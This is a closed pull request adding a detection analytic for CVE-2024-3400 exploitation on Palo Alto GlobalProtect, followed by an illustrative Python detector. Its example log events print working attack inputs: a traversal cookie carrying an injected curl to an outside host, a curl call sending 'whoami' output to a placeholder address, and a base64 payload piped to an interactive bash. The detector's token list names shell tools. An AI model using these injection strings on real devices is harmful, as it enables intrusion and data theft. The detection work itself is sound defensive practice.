Closed netgrain closed 5 months ago
Summary of the Pull Request

Adds analytic to detect suspicious file creation activity related to the exploitation of CVE-2024-3400.
Note that CVE-2024-3400 is a chained exploit consisting of two vulnerabilities:
This analytic covers both vulnerabilities and is validated based on non-public incidents.

Changelog

new: Potential CVE-2024-3400 Exploitation - Palo Alto GlobalProtect OS Command Injection - File Creation

Example Log Event

Network request

Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226curl${IFS}x1.outboundhost.com;

Device log entry

curl${IFS}x1.outboundhost.com
/opt/panlogs/tmp/device_telemetry/hour/soTetea1curl${IFS}http://a.b.c.d/?u=$(whoami)
/opt/panlogs/tmp/device_telemetry/minute/h4echo${IFS}OTYkKHVuYW1lIC1hKSA+IC92YXIvYXBwd2ViL3NzbHZwbmRvY3MvZ2xvYmFsLXByb3RlY3QvcG9ydGFsL2ltYWdlcy9wYWxvYWx0by1sb2dvLnR4dA==|base64${IFS}-d|bash${IFS}-i
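The example events above show the two observables a defender can correlate: the SESSID cookie that carries a traversal path into the telemetry directory, and the file-creation event whose file name is actually an injected command. The following is an added illustration, not the PR's rule or any Palo Alto code, of running that correlation over the page's example events; the token list and the benign sample file are assumptions for this illustration, not the rule's actual selection criteria.

```python
import posixpath
import re

# Directory the PR's example events point at (taken from the page).
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/"

# Fragments that should never appear in a telemetry file name.
# Assumed criteria for this illustration, not the rule's own selection.
SUSPICIOUS_TOKENS = ("${IFS}", "$(", "`", "|", ";", "curl", "wget", "bash", "base64")

def sessid_to_created_path(cookie_header):
    """Resolve the SESSID cookie value to the path the firewall would create.

    Returns None when the header carries no SESSID. The leading '/../..'
    traversal is collapsed with posixpath.normpath, mirroring what a path
    walk does when '..' is applied at the filesystem root.
    """
    m = re.search(r"SESSID=([^;]+)", cookie_header)
    return posixpath.normpath(m.group(1)) if m else None

def split_device_log_entry(entry):
    """Split a device log line that runs several absolute paths together."""
    return [p for p in re.split(r"\s+(?=/)", entry.strip()) if p]

def suspicious_telemetry_files(paths):
    """Return the paths under TELEMETRY_DIR whose file name carries a shell marker."""
    hits = []
    for path in paths:
        if path.startswith(TELEMETRY_DIR):
            name = path.rsplit("/", 1)[-1]
            if any(tok in name for tok in SUSPICIOUS_TOKENS):
                hits.append(path)
    return hits

# Constructed sample built from the PR's example events plus one benign file;
# the base64 payload from the page is replaced by a placeholder.
SAMPLE_COOKIE = ("Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/"
                 "hellothere226curl${IFS}x1.outboundhost.com;")
SAMPLE_DEVICE_LOG = (
    "/opt/panlogs/tmp/device_telemetry/hour/soTetea1curl${IFS}http://a.b.c.d/?u=$(whoami) "
    "/opt/panlogs/tmp/device_telemetry/minute/h4echo${IFS}BASE64ELIDED|base64${IFS}-d|bash${IFS}-i"
)
BENIGN_PATH = "/opt/panlogs/tmp/device_telemetry/minute/telemetry_1713000000.tgz"  # constructed

def demo():
    paths = [sessid_to_created_path(SAMPLE_COOKIE), BENIGN_PATH]
    paths += split_device_log_entry(SAMPLE_DEVICE_LOG)
    return suspicious_telemetry_files(paths)

if __name__ == "__main__":
    for hit in demo():
        print("suspicious telemetry file:", hit)
```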